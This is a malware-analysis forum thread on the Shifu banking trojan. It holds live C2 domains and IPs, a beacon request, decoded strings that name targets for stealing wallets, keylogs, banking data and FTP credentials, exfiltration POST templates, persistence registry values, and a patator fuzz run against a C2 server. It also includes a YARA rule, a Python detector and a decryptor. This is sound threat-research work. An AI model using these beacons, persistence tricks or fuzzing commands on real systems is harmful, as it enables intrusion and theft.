A forum for reverse engineering, OS internals and malware analysis 
 #26636  by Xylitol
 Tue Sep 01, 2015 10:32 am
Dump of b9bc3f1b2aace824482c10ffa422f78b: 8/57

Network traffic:
/news/userlogin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www1.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: eboduftazce-ru.com:443
Content-Length: 114
Cache-Control: no-cache
• dns: 1 ›› ip: 188.42.254.65 - adress: EBODUFTAZCE-RU.COM
DGA active domain:
• dns: 1 ›› ip: 188.42.254.65 - adress: AEHTCDB.INFO
Another file that connects to the same host is in the attachment.
VT: 34/57 - unpack: 7/57

Some strings from the xor proc:
IntelPowerAgent32
rundll32.exe shell32.dll, ShellExec_RunDLL
software\\microsoft\\windows\\currentversion\\run
software\\microsoft\\windows nt\\currentversion\\winlogon
kernel
.exe
.dll
GetProcessUserModeExceptionPolicy
IsWow64Process
%s:Zone.Identifier
%OS%_%NUMBER_OF_PROCESSORS%
%02x
pos.exe
bank.exe
tellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jackhenry|cruisenet|gplusmain|silverlake|v48d0250s1
bitcoin\\wallet.dat
litecoin\\wallet.dat
C:\\Omikron\\MCSign
ELBA5\ELBA_data
HBPData\\hbp.profile
iexplore.exe|opera.exe|firefox.exe|chrome.exe|maxthon.exe|java.exe|javaw.exe|plugin-container.exe|acrobat.exe|acrod32.exe
C:\\Documents and Settings\\Administrateur\\Application Data\\2cd56582\\keylog.txt
Malware persistence via HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run:
rundll32.exe shell32.dll, ShellExec_RunDLL C:\Documents and Settings\All Users\Application Data\bhf28d4426.exe
Basically, for the infection set-up: drop a copy, corrupt the first location of the file, create persistence and CreateRemoteThread.
He uses the Windows registry to get the right explorer (software\microsoft\windows nt\currentversion\winlogon\shell) to avoid injecting into Total Commander or apps like that, I believe.
You can replace the value to make it inject into empty.exe or whatever to facilitate debugging.

Injection fail (patch at 40156A to derivate, 401677 for 9F4771249DC26A0C49E647D13B6DE242): [screenshot]
Keylogger: [screenshot]
rule Shifu
{
    meta:
        author = "xylitol@temari.fr"
        description = "Search for hex and strings pattern on Win32/Spy.Shiz.NCP (Shifu)"
        // May only the challenge guide you...

    strings:
        $a1 = {C7 06 3C 00 00 00 C7 46 0C ?? ?? ?? ?? 89 5E 10 89 46 14 C7 46 04 40 00 00 00 EB 1C}
        $a2 = {85 C0 75 3A 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0}
        $a3 = {8A 1C 0E 32 5D 0C 88 19 41 4A 75 F4}

        $b1 = "cmd.exe" wide ascii
        $b2 = "runas" wide ascii
        $b3 = "exe"
    condition:
        all of ($a*) and 2 of ($b*)
}
Shifu also searches for bitcoin and litecoin wallets, which is not mentioned in the IBM report.
edit: VirusBulletin guys released a cool paper: https://www.virusbtn.com/virusbulletin/ ... 1511-Shifu
edit 2: Vidya: https://www.youtube.com/watch?v=eenMSH69psQ
Attachments
infected
 #26648  by unixfreaxjp
 Wed Sep 02, 2015 9:56 pm
CNC was called via IE API, just a plain HTTPS request after revoking the cert; forensic reversing memory data is below:
 0x024DECCF push ebp ;; xref: 0x24DEFD7
 0x024DECD0 mov ebp, esp
 0x024DECD2 sub esp, 0Ch
 0x024DECD5 push esi
 0x024DECD6 push dword ptr [ebp+0x0C]
 0x024DECD9 mov esi, dword ptr [0x024EB39C]; <==="8L" xref:0x02C4C38)
 0x024DECDF push dword ptr [ebp+0x08]
 0x024DECE2 push 0x0
 0x024DECE4 push 0x0
 0x024DECE6 push edi
 0x024DECE7 call esiHttpSendRequestA@WININET.DLL (FLAG: Import,Hide,5 values params)
 0x024DECE9 mov dword ptr [ebp-08h], eax // https://eboduftazce-ru.com/news/userlogin.php
 0x024DECEC test eax, eax;; exec (HttpSendRequestA boom..exec!)
 0x024DECEE jne 0x024DED43 ;; comp.
Filling in HttpSendRequestA() with its Xcalled components shows what was actually being used for these lame calls; it is like simply kicking HTTPS via IE:
HTTP API_Syscalls
{
 HINTERNET HttpOpenRequest(
  _In_ HINTERNET hConnect: TRUE from InternetConnect()
  _In_ LPCTSTR   lpszVerb: NULL (shows GET)
  _In_ LPCTSTR   lpszObjectName: "/news/userlogin.php"
  _In_ LPCTSTR   lpszVersion: NULL {VALUE OF IE IS FILLED HERE}
  _In_ LPCTSTR   lpszReferer: "xxx"
  _In_ LPCTSTR   *lplpszAcceptTypes: Excerpts from IE for known header media
  _In_ DWORD     dwFlags,
  _In_ DWORD_PTR dwContext )
  {
  HINTERNET InternetConnect(
    _In_ HINTERNET     hInternet: TRUE from InternetOpen()
    _In_ LPCTSTR       lpszServerName: eboduftazce-ru.com
    _In_ INTERNET_PORT nServerPort: INTERNET_DEFAULT_HTTPS_PORT (443)
    _In_ LPCTSTR       lpszUsername: NULL
    _In_ LPCTSTR       lpszPassword: NULL
    _In_ DWORD         dwService: INTERNET_SERVICE_HTTP
    _In_ DWORD         dwFlags: NULL
    _In_ DWORD_PTR     dwContext: NULL );
   {
   HINTERNET InternetOpen(
     _In_ LPCTSTR lpszAgent: {VALUE OF IE IS FILLED HERE}
     _In_ DWORD   dwAccessType: INTERNET_OPEN_TYPE_DIRECT
     _In_ LPCTSTR lpszProxyName: NULL
     _In_ LPCTSTR lpszProxyBypass: NULL
     _In_ DWORD   dwFlags: NULL );
}}}
It seems that someone in RU is using the Maxided hoster in a Singapore IDC for this badness:
{
  "ip": "188.42.254.65",
  "hostname": "maxided.com",
  "city": "Singapore",
  "country": "SG",
  "loc": "1.2931,103.8558",
  "org": "AS45470 8 to Infinity Pte Ltd"
}
 #26649  by Xylitol
 Wed Sep 02, 2015 11:16 pm
Okay so, there is a pushad at 403888, you will recognise AP32 of APlib and get the payload after reaching popad (or check the attachment, x86).
There is more on the unpacked binary if you search for AP32, it's probably the x86/x64 payloads.
Related to the file, he also has a lot of XORs; you can use XORSearch by Didier Stevens to get strings.
Import table is fucked and needs to be rewritten (the author is relocating and used tricks to make it harder to fix).
botid=%s&ver=%s.%u&up=%u&os=%u&ltime=%s%d&token=%d&cn=%s&av=%s&dmn=%s
&ok=%s&id=%d&res_code=%d&res_text=%s
position: form-data; name=\"pcname\"\r\n\r\n%s!%s\r\n
position: form-data; name=\"file\"; filename=\"report\"\r\nContent-Type: text/plain\r\n\r\n%s\r\n
eboduftazce-ru.com
keylog.txt
type=ftp
httpd.conf
httpd.exe
../news/imageupload.php
../news/userpanel.php
../data/index.php
../news/users.php
../news/userlogin.php
../data/config.php
VT: 10/57
Edit: attached an 'empty.exe' due to pm request.
Attachments
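An added example, not code from the thread: the beacon shown in the first post (odd User-Agent, POST to /news/userlogin.php on 443, fake google Referer) and the panel paths listed just above, turned into a small detector run over constructed proxy log lines. The tab-separated log layout and the client IPs are assumptions.

```python
import re

# Beacon traits quoted in the thread: an "MSIE 2.1" User-Agent that also claims
# Trident/4.0 (no real browser pairs those), a POST of form-urlencoded data to
# the panel's login script over 443, and a fake google Referer.
SHIFU_UA_RE = re.compile(r"MSIE 2\.1;.*Trident/4\.0")
PANEL_PATHS = ("/news/userlogin.php", "/news/imageupload.php",
               "/news/userpanel.php", "/news/users.php")

# Constructed proxy log, tab-separated (layout is an assumption):
# client  method  host:port  path  referer  user-agent
SAMPLE_LOG = """\
10.0.0.5\tPOST\teboduftazce-ru.com:443\t/news/userlogin.php\thttps://www1.google.com\tMozilla/4.0 (compatible; MSIE 2.1; Windows NT 5.1; Trident/4.0; SLCC2)
10.0.0.7\tGET\twww.example.com:443\t/index.html\t-\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/40.0
10.0.0.9\tPOST\tupdates.example.net:443\t/news/userlogin.php\t-\tMozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
"""


def classify(line: str) -> list:
    """Return the Shifu indicators matched by one log line (empty if malformed)."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6:
        return []
    _client, method, _hostport, path, referer, ua = fields
    hits = []
    if SHIFU_UA_RE.search(ua):
        hits.append("shifu-user-agent")
    if method == "POST" and path in PANEL_PATHS:
        hits.append("panel-path-post")
    if method == "POST" and referer.startswith("https://www1.google.com"):
        hits.append("fake-google-referer")
    return hits


def is_beacon(hits) -> bool:
    """The User-Agent alone is decisive; a panel path or Referer alone is weak
    (a legitimate site may well have /news/userlogin.php), so require two."""
    return "shifu-user-agent" in hits or len(hits) >= 2


def scan(log: str) -> dict:
    """Map each client to its matched indicators; clients with no hits are left out."""
    findings = {}
    for line in log.splitlines():
        hits = classify(line)
        if hits:
            findings.setdefault(line.split("\t")[0], set()).update(hits)
    return findings
```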
 #26664  by Xylitol
 Fri Sep 04, 2015 2:38 pm
Got that file from my previous YARA rule:
https://www.virustotal.com/en/file/c509 ... 441377291/
• dns: 1 ›› ip: 5.149.249.181 - adress: BLATNOIDOMEN.COM
python patator.py http_fuzz url=https://blatnoidomen.com/english/FILE0 method=GET 0=pwner.txt follow=1 accept_cookie=1 -x ignore:code=404 -x ignore:code=400
14:50:03 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-09-04 14:50 UTC
14:50:03 patator    INFO -
14:50:03 patator    INFO - code size:clen       time | candidate                          |   num | mesg
14:50:03 patator    INFO - -----------------------------------------------------------------------------
14:50:04 patator    INFO - 200  203:0          0.063 | index.php                          |     5 | HTTP/1.1 200 OK
14:50:04 patator    INFO - 403  496:299        0.063 | uploads                            |    50 | HTTP/1.1 403 Forbidden
14:50:04 patator    INFO - 403  493:296        0.057 | logs                               |    98 | HTTP/1.1 403 Forbidden
14:50:05 patator    INFO - 403  493:296        0.058 | help                               |   175 | HTTP/1.1 403 Forbidden
14:50:05 patator    INFO - 200  203:0          0.062 | get.php                            |   225 | HTTP/1.1 200 OK
14:50:06 patator    INFO - 200  203:0          0.059 | common.php                         |   318 | HTTP/1.1 200 OK
14:50:06 patator    INFO - 403  492:295        0.057 | sql                                |   351 | HTTP/1.1 403 Forbidden
14:50:07 patator    INFO - 403  493:296        0.064 | .php                               |   454 | HTTP/1.1 403 Forbidden
14:50:07 patator    INFO - 200  203:0          0.064 | cfg.php                            |   449 | HTTP/1.1 200 OK
14:50:08 patator    INFO - 403  495:298        0.063 | models                             |   673 | HTTP/1.1 403 Forbidden
14:50:10 patator    INFO - 403  494:297        0.082 | geoip                              |   922 | HTTP/1.1 403 Forbidden
14:50:15 patator    INFO - 403  498:301        0.058 | .htpasswd                          |  1660 | HTTP/1.1 403 Forbidden
14:50:15 patator    INFO - 200  203:0          0.067 | notify.php                         |  1782 | HTTP/1.1 200 OK
14:50:19 patator    INFO - 200  203:0          0.060 | whois.php                          |  2255 | HTTP/1.1 200 OK
14:50:30 patator    INFO - 403  495:298        0.057 | jabber                             |  3919 | HTTP/1.1 403 Forbidden
14:50:46 patator    INFO - 403  493:296        0.058 | .htm                               |  6264 | HTTP/1.1 403 Forbidden
14:50:48 patator    INFO - 403  500:303        0.058 | .httpd.conf                        |  6476 | HTTP/1.1 403 Forbidden
14:50:50 patator    INFO - 403  499:302        0.059 | .httaccess                         |  6825 | HTTP/1.1 403 Forbidden
14:50:53 patator    INFO - 403  498:301        0.058 | .htaccess                          |  7156 | HTTP/1.1 403 Forbidden
Malwarebytes added the signature "Spyware.Shifu", it seems.
 #26669  by unixfreaxjp
 Sat Sep 05, 2015 1:11 pm
My collected samples so far:
26/57 2015-09-04 13:31:52 c509030aa23bec8bdbec049aaffbcebf86ef8b9f08adca9e7988246df89b0899
28/57 2015-09-02 19:19:55 029fd0f04898082f4dd918ae6dd07132d98fe2508e33cec7f74e3b525f264331
18/57 2015-08-30 19:47:15 55a6ac329fca1bc63bbb1f9d90bf1e980b3b3ea2c28ab4e3bc73e2764440c79a
20/57 2015-08-30 19:07:05 f6ce662f0016afaa0d32096d3515105806ad8abb395d49b1e0f49c218233128b 
All call back to:
## GeoIP:
   {
     "ip": "5.149.249.181",
     "hostname": "No Hostname",
     "city": null,
     "country": "NL",
     "loc": "52.3667,4.9000",
     "org": "AS59711 FORTUNIX NETWORKS L.P."
   }
 #26686  by comak
 Tue Sep 08, 2015 10:13 am
I got a few more:
Also attached: clean dropper and clean payload DLL, and a script to fix the IAT of the DLL.
Attachments
pw: infected
 #26688  by Xylitol
 Tue Sep 08, 2015 11:29 am
Behavior analysis from VT, DNS requests:
Another DGA active domain:
• dns: 1 ›› ip: 91.233.244.102 - adresse: URKAELT.INFO
 #26699  by comak
 Wed Sep 09, 2015 6:56 pm
It turns out extracting data from it is quite simple; in the attachment is some data I got from the above samples.

There are 2 hardcoded CnCs:
  "cnc": "blatnoidomen.com",
  "cnc": "eboduftazce-ru.com",
one seed for DGA:
   "dga_seed": 976302970, 
and two different DGA configurations:
  "dga_cfg": "B2luZm8AAAC75IWXxwy6uvPkhZc=",
  "dga_cfg": "B2luZm8AAACpFyvgXwu6uu0XK+A=",
Attachments
pw: infected
 #27275  by sysopfb
 Fri Nov 20, 2015 2:39 pm
Some variation from what I've seen reported with this sample

Uses an RC4 key similar to the virusbtn.com report https://www.virusbtn.com/virusbulletin/ ... 1511-Shifu

Key:
a8zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH

Doesn't use the standard RC4 key scheduling algorithm; instead it XORs the S-box with the key.

Standard from wiki:
    S = list(range(256))  # identity S-box before the key schedule
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]
Replaced with:
    S = list(range(256))  # same identity S-box, but no swap loop
    for i in range(len(S)):
        S[i] ^= ord(key[i % len(key)])
Registry Persistence:
Persistence key built with the hardcoded value IntelPowerAgent and a decimal number; the decimal number is chosen using:
GetTickCount % 0xA

NamedPipe:
Name of the created pipe is the crc32 of the system directory with an initial value of 0x31337
Ex:
C:\Windows with initial 0x31337 -> f4afb7f
\\.pip\f4afb7f

Also stores its AP32 compressed payloadx86.dll in the registry under HKCU\..\Software\Microsoft\Windows\
The key name is built by expanding the following:
%OS%_%NUMBER_OF_PROCESSORS%
Ex:
sha1sum(Windows_NT_1)
Take the first 4 hex bytes of the hash and convert to string: 2d17e659
Then CRC32 with an initial value of 0x4e67b4a9 -> 4334c972
XOR decoded strings:
"Software\Microsoft\Windows\Curre"
"ntVersion\explorer\Browser Helpe"
"r Objects\{8CA7E745-EF75-4E7B-BB"
"86-8065C0CE29CA}"
"Software\Microsoft\Windows NT\Cu"
"rrentVersion"
"InstallDate"
"%X!%X!%08X"
"ntdll.dll"
"RtlComputeCrc32"
"ntdll.dll"
"RtlComputeCrc32"
"TREASURE|BUH|BANK|ACCOUNT|CASH|F"
"INAN|MONEY|MANAGE|OPER|DIRECT|RO"
"SPIL|CAPO|BOSS|TRADE"
"botid=%s&ver=%s.%u&up=%u&os=%u&l"
"time=%s%d&token=%d&cn=%s&av=%s&d"
"mn=%s"
"a2"
"Microsoft\Microsoft Antimalware"
"Software\Avg"
"Software\G Data"
"Software\Avira"
"Software\AVAST Software\Avast"
"Software\KasperskyLab\protected"
"Software\Bitdefender"
"Software\Panda Software"
"Software\Sophos"
"Software\Coranti"
"Software\rising"
"Software\TrendMicro"
"Software\Symantec"
"Software\ComodoGroup"
"Software\Network Associates\TVD"
"Software\Data Fellows\F-Secure"
"Software\Eset\Nod"
"Software\Softed\ViGUARD"
"Software\Zone Labs\ZoneAlarm"
"Software\VBA32"
"Software\Doctor Web"
"Mozilla/4.0 (compatible; MSIE 2."
"1; Windows NT 5.0; Trident/4.0; "
"SLCC2; .NET CLR 2.0.50727; .NET "
"CLR 3.5.30729; .NET CLR 3.0.3072"
"9; Media Center PC 6.0)"
"CERT"
"cmdline.txt"
" crc32[%x]"
"ntdll.dll"
"RtlComputeCrc32"
"torrent"
"crypt32.dll"
"PFXImportCertStore"
"\system32\rstrui.exe"
"iexplore.exe|opera.exe|firefox.e"
"xe|chrome.exe|maxthon.exe|java.e"
"xe|javaw.exe|plugin-container.ex"
"e|acrobat.exe|acrod32.exe"
"a8zoSTHljZylEx4o3mJ2eqIdsEguKC15"
"KnyQdfx4RTc5sjH"
"adtejoyo1377.tk"
"/cloud/userlogin.php"
"Referer: https://www.google.com."
"."
"POST"
"HTTP/1.1"
"Content-Type: application/x-www-"
"form-urlencoded.."
"USER "
"PASS "
"ACCT "
"AUTHINFO USER "
"AUTHINFO PASS "
"vk.com"
"yandex.ru"
"http://%s"
"\*.*"
".."
Attachments
pw: infected
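An added example, not the post's or the sample's own code: the XORed-S-box RC4 variant and the two CRC32-derived names (pipe name, registry value name) described in this post, in Python. That ntdll's RtlComputeCrc32 with an initial value behaves like zlib.crc32(buf, init), and that the path is hashed as ANSI bytes, are assumptions; the post's reference values (f4afb7f, 4334c972) are what to compare the output against.

```python
import hashlib
import zlib

# RC4 key quoted in the post above.
KEY = b"a8zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjH"


def shifu_sbox(key: bytes) -> list:
    """Shifu's replacement for the RC4 KSA: no swap loop, the identity S-box
    is just XORed with the repeating key (so it need not be a permutation)."""
    sbox = list(range(256))
    for i in range(256):
        sbox[i] ^= key[i % len(key)]
    return sbox


def shifu_rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 PRGA run over the XORed S-box. Output is data XOR
    keystream, so the same call both encrypts and decrypts."""
    s = shifu_sbox(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32_init(data: bytes, init: int) -> int:
    # Assumption: ntdll's RtlComputeCrc32(init, buf, len), which the decoded
    # strings show the sample resolving, behaves like zlib.crc32(buf, init).
    return zlib.crc32(data, init) & 0xFFFFFFFF


def pipe_name(system_dir: str = r"C:\Windows") -> str:
    """Pipe name per the post: CRC32 of the system directory with initial
    value 0x31337 (post's reference for C:\\Windows: f4afb7f). Hashing the
    ANSI bytes of the path is an assumption; compare against that value."""
    return "%x" % crc32_init(system_dir.encode("ascii"), 0x31337)


def payload_key_name(expanded_env: str = "Windows_NT_1") -> str:
    """Registry name per the post: sha1 of the expanded
    %OS%_%NUMBER_OF_PROCESSORS%, first 4 bytes as 8 hex chars, then CRC32 of
    that text with initial value 0x4e67b4a9 (post's reference: 4334c972)."""
    prefix = hashlib.sha1(expanded_env.encode("ascii")).hexdigest()[:8]
    return "%x" % crc32_init(prefix.encode("ascii"), 0x4E67B4A9)
```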